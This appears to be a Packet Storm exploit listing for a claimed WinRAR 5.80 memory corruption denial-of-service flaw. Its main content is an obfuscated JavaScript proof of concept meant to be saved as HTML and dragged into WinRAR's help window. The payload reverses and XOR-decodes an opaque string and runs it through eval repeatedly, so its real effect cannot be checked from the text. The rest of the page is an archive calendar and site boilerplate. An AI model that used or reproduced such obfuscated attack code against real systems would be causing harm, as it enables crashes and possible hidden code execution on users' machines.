exploit the possibilities

WinRAR 5.80 Memory Corruption

WinRAR 5.80 Memory Corruption
Posted Oct 20, 2019
Authored by albalawi-s

WinRAR version 5.80 suffers from a memory corruption vulnerability that allows for denial of service.

tags | exploit, denial of service
MD5 | 5cd496b535b61b4e2d439234eab006e5

WinRAR 5.80 Memory Corruption

Change Mirror Download

# Exploit Title: winrar memory corruption
# Exploit Author: albalawi-s
# Vendor Homepage: https://win-rar.com
# Software Link: https://win-rar.com/fileadmin/winrar-versions/winrar-x64-58b2.exe
# Version: [5.80]
# Tested on: [Microsoft Windows Version 10.0.18362.418 64bit]
#https://twitter.com/test_app_______

------------------------------------------------
# poc video
https://www.youtube.com/watch?v=NVDVP33kHuU

# POC

1- open winrar or any file.rar
2- help
3- help topics
4- Drag the exploit.html to the window


--------------------------------------------------
Save the content html

******************************************

<script type="text/javascript">
//<![CDATA[
<!--
var x="function f(x){var i,o=\"\",l=x.length;for(i=l-1;i>=0;i--) {try{o+=x.c" +
"harAt(i);}catch(e){}}return o;}f(\")\\\"function f(x,y){var i,o=\\\"\\\\\\\""+
"\\\\,l=x.length;for(i=0;i<l;i++){y%=127;o+=String.fromCharCode(x.charCodeAt" +
"(i)^(y++));}return o;}f(\\\"\\\\K_RG^Q[B\\\\\\\\031OKSOYQP\\\\\\\\027b}*7))" +
"x\\\\\\\\033:\\\\\\\\025$w!(:.p9&'$x3&-0,f\\\\\\\\000\\\\\\\\177&r\\\\\\\\0" +
"25\\\\\\\\000O\\\\\\\\000\\\\\\\\013\\\\\\\\010\\\\\\\\026\\\\\\\\006\\\\\\" +
"\\034\\\\\\\\000\\\\\\\\010\\\\\\\\007\\\\\\\\t1LO\\\\\\\\023\\\\\\\\036\\\\"+
"\\\\034\\\\\\\\007\\\\\\\\021\\\\\\\\033\\\\\\\\002J$[3>AE\\\\\\\\\\\"\\\\\\"+
"\\\\\\\\\"\\\\?^qXk:jm}k+dyz\\\\\\\\177=tcf}c+K:\\\\\\\\\\\\\\\\bkuo{l|\\\\" +
"\\\\003\\\\\\\\002@KKRBF]\\\\\\\\027w\\\\\\\\016\\\\\\\\000\\\\\\\\037s\\\\" +
"\\\\022\\\\\\\\017nAh[\\\\\\\\nUW]C\\\\\\\\005`ObQ|2!1-52g$($,9,)*m\\\\\\\\" +
"rp\\\\\\\\005\\\\\\\\026\\\\\\\\0065%1).u\\\\\\\\0313=0\\\\\\\\004\\\\\\\\0" +
"04>AZ9\\\\\\\\024;\\\\\\\\0065\\\\\\\\0307\\\\\\\\002MNO4\\\\\\\\030\\\\\\\\"+
"037S\\\\\\\\007\\\\\\\\035\\\\\\\\032WX%\\\\\\\\010'\\\\\\\\022]^ Rgw$vnk(4" +
"*H~ho{u^pyqvb?D;Mh\\\\\\\\177owoT\\\\\\\\017qKAIJ{\\\\\\\\n\\\\\\\\000\\\\\\"+
"\\n\\\\\\\\013p_rA\\\\\\\\020\\\\\\\\021\\\\\\\\022pUYZ\\\\\\\\027KQV\\\\\\" +
"\\025nHP\\\\\\\\027\\\\\\\\034c\\\\\\\\036a\\\\\\\\030g%*,g/3)\\\\\\\\021l\\"+
"\\\\\\023r\\\\\\\\rpztu\\\\\\\\n%\\\\\\\\0047z{|\\\\\\\\016;+@\\\\\\\\022\\" +
"\\\\\\n\\\\\\\\017DXF)\\\\\\\\007\\\\\\\\035\\\\\\\\002\\\\\\\\002\\\\\\\\0" +
"02\\\\\\\\nNOPQ.\\\\\\\\001(\\\\\\\\033VWX%\\\\\\\\010'\\\\\\\\022AQsbpjtq8" +
"[zUd7\\\\\\\\177n|f`e2gmes*D;n~di1uAWCPGWOW\\\\\\\\\\\\\\\\u\\\\\\\\010\\\\" +
"\\\\025p_rAVD\\\\\\\\\\\\\\\\P@\\\\\\\\\\\\\\\\YY\\\\\\\\030\\\\\\\\\\\\\\\\"+
"B\\\\\\\\023\\\\\\\\025\\\\\\\\035Ec2\\\\\\\\035,\\\\\\\\03703'5h+?-*(<omq\\"+
"\\\\\\016q\\\\\\\\010wm\\\\\\\\013*\\\\\\\\0054\\\\\\\\007(;1-@I\\\\\\\\024" +
"\\\\\\\\002\\\\\\\\026E\\\\\\\\017GUIZPL\\\\\\\\004NSPDBCDEFGCY\\\\\\\\023P" +
"WT^{]p_jYr[|k\\\\\\\\177mjh|/;,2O6m\\\\\\\\\\\"\\\\&D;!GnApCT\\\\\\\\\\\\\\" +
"\\~QxKzS^HX\\\\\\\\013NXHIUC\\\\\\\\000\\\\\\\\023\\\\\\\\t\\\\\\\\025TB^__" +
"I\\\\\\\\007aLc.\\\\\\\\0356%+7fo!iwk|vn&pmrfdefgcy3pwt~$<\\\\\\\\023>\\\\\\"+
"\\r8\\\\\\\\021:\\\\\\\\023\\\\\\\\n\\\\\\\\034\\\\\\\\014\\\\\\\\r\\\\\\\\" +
"t\\\\\\\\037\\\\\\\\\\\\\\\\O[LR\\\\\\\\021\\\\\\\\001\\\\\\\\023\\\\\\\\02" +
"0\\\\\\\\022\\\\\\\\nB&\\\\\\\\t \\\\\\\\023\\\\\\\\\\\"\\\\t|^qXkZslfi~ah`" +
"{>e{gxp6*8{o}zxl-\\\\\\\\033}P\\\\\\\\177JXzUtG\\\\\\\\026\\\\\\\\004_N\\\\" +
"\\\\\\\\\\\\F@E\\\\\\\\014\\\\\\\\017\\\\\\\\033]SV\\\\\\\\\\\\\\\\\\\\\\\\" +
"007\\\\\\\\006YSYG\\\\\\\\037//.,%!{\\\\\\\\033j,2ce\\\\\\\\021lq\\\\\\\\01" +
"4#\\\\\\\\016=hz7i\\\\\\\\004+\\\\\\\\0065`r<0\\\\\\\\004\\\\\\\\030\\\\\\\\"+
"\\\\\\\\?\\\\\\\\0269\\\\\\\\010[G\\\\\\\\001\\\\\\\\036\\\\\\\\006\\\\\\\\" +
"000SLFKAI\\\"\\\\,47)\\\"(f};)lo,0(rtsbus.o nruter};)i(tArahc.x=+o{)--i;0=>" +
"i;1-l=i(rof}}{)e(hctac};l=+l;x=+x{yrt{)74=!)31/l(tAedoCrahc.x(elihw;lo=l,ht" +
"gnel.x=lo,\\\"\\\"=o,i rav{)x(f noitcnuf\")" ;
while(x=eval(x));
//-->
//]]>
</script>

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

February 2020

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Feb 1st
    1 Files
  • 2
    Feb 2nd
    2 Files
  • 3
    Feb 3rd
    17 Files
  • 4
    Feb 4th
    15 Files
  • 5
    Feb 5th
    24 Files
  • 6
    Feb 6th
    16 Files
  • 7
    Feb 7th
    19 Files
  • 8
    Feb 8th
    2 Files
  • 9
    Feb 9th
    2 Files
  • 10
    Feb 10th
    15 Files
  • 11
    Feb 11th
    20 Files
  • 12
    Feb 12th
    16 Files
  • 13
    Feb 13th
    19 Files
  • 14
    Feb 14th
    17 Files
  • 15
    Feb 15th
    4 Files
  • 16
    Feb 16th
    4 Files
  • 17
    Feb 17th
    34 Files
  • 18
    Feb 18th
    13 Files
  • 19
    Feb 19th
    0 Files
  • 20
    Feb 20th
    0 Files
  • 21
    Feb 21st
    0 Files
  • 22
    Feb 22nd
    0 Files
  • 23
    Feb 23rd
    0 Files
  • 24
    Feb 24th
    0 Files
  • 25
    Feb 25th
    0 Files
  • 26
    Feb 26th
    0 Files
  • 27
    Feb 27th
    0 Files
  • 28
    Feb 28th
    0 Files
  • 29
    Feb 29th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2016 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close